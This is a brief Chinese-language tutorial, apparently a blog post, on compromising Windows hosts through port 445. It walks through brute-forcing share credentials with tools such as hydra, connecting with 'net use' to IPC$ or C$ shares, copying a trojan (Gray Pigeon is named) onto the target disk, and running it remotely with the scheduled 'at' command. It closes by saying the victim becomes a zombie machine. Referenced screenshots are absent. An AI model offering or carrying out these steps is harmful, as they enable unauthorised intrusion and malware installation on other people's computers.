网络安全:通过445端口暴力破解植入木马。
木马制作工具,如:灰鸽子等等
445端口是文件共享端口。可以进入对方文件硬盘进行植入木马:
使用文件共享进入对方磁盘:
在cmd输入net use \\x.x.x.x\ipc$
之后会让你输入账号和密码:
ipc$中$代表共享
$之前代表的是共享什么文件夹,ipc是通用的,也可以是C$共享C盘,D$共享D盘。
还可以通过直接输入账号密码,进入共享。
命令:net use \\x.x.x.x\ipc$ 密码 /user:账号
这里账号和密码的获得可以通过暴力破解
工具有很多,如:hydra、NTscan、nmap等等。
利用copy可以将木马程序放入对方磁盘:
程序放入对方磁盘后,就需要在对方电脑上执行了。
本地的cmd上并不能让程序在对方电脑上执行,如果使用\\10.1.1.2\C$\system.exe。此时其实是在本地电脑执行这个程序。因为选择\\10.1.1.2相当于是自己的磁盘。
我们需要用到at这个命令。
at这个命令专门让远程的主机去执行这个某条指令,可以从图中第一行看到at命令的帮助信息:
同时at是可以定时,因为可能地区上的差异,可以用net time \\10.1.1.2看对方主机的时间
如上图可以让对方主机执行这条命令。
需要注意,这里时间最后写对方主机时间后3分钟开外,否则有可能让系统认为是明天
最后可以用 at \\10.1.1.2来查看作业
完成后就拥有一台肉鸡拉
